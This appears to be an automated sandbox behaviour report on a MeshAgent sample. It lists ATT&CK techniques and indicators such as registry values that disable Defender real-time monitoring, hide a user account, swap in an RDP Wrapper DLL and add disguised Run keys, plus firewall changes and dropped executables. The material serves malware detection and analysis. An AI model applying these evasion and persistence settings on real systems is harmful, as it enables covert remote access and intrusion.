meshagent | 15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

flow	pid	Process
4	5716	powershell.exe
5	5768	powershell.exe
7	3268	powershell.exe
8	1444	powershell.exe
9	4520	powershell.exe
10	2916	powershell.exe
17	704	powershell.exe
18	5720	powershell.exe
24	1712	cscript.exe
26	5324	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3268	powershell.exe
2916	powershell.exe
5720	powershell.exe
6004	powershell.exe
5716	powershell.exe
5768	powershell.exe
704	powershell.exe
1444	powershell.exe
4520	powershell.exe
5332	powershell.exe
5332	powershell.exe
1900	powershell.exe
3464	powershell.exe
3416	powershell.exe
1552	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 9 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
560	netsh.exe
2404	netsh.exe
5384	netsh.exe
2100	netsh.exe
3292	netsh.exe
5272	netsh.exe
5720	netsh.exe
2668	netsh.exe
4636	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 10 IoCs

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2588	attrib.exe
5612	attrib.exe
3028	attrib.exe
2864	attrib.exe

Sets service image path in registry 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" "	s.exe

Executes dropped EXE 23 IoCs

pid	Process
4540	MeshAgent.exe
1208	MeshAgent.exe
1868	RDPWInst.exe
1744	MeshAgent.exe
4280	RDPWInst.exe
5036	RDPWInst.exe
816	MeshAgent.exe
2968	RDPWInst.exe
6000	RDPWInst.exe
3332	MeshAgent.exe
5692	RDPWInst.exe
776	RDPWInst.exe
4728	MeshAgent.exe
1240	RDPWInst.exe
2156	RDPWInst.exe
5708	RDPWInst.exe
3944	MeshAgent.exe
2416	RDPWInst.exe
6068	MeshAgent.exe
4552	MeshAgent.exe
1836	MeshAgent.exe
2976	MeshAgent.exe
5124	MeshAgent.exe

Loads dropped DLL 7 IoCs

pid	Process
2764	svchost.exe
452	svchost.exe
5364	svchost.exe
5152	svchost.exe
3148	svchost.exe
4904	svchost.exe
5780	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
24	raw.githubusercontent.com
26	raw.githubusercontent.com
2	raw.githubusercontent.com
11	raw.githubusercontent.com
14	raw.githubusercontent.com
20	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 5 IoCs

Winlogon Helper DLL

T1547.004

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\1847AE59126C78560ED59F49F6BC56F9B9A6BC21	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb	MeshAgent.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File created	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File created	C:\Program Files\RDP Wrapper\update.zip	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.zip	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1684	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 27 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1100	PING.EXE
4032	PING.EXE

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742652728901001"	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
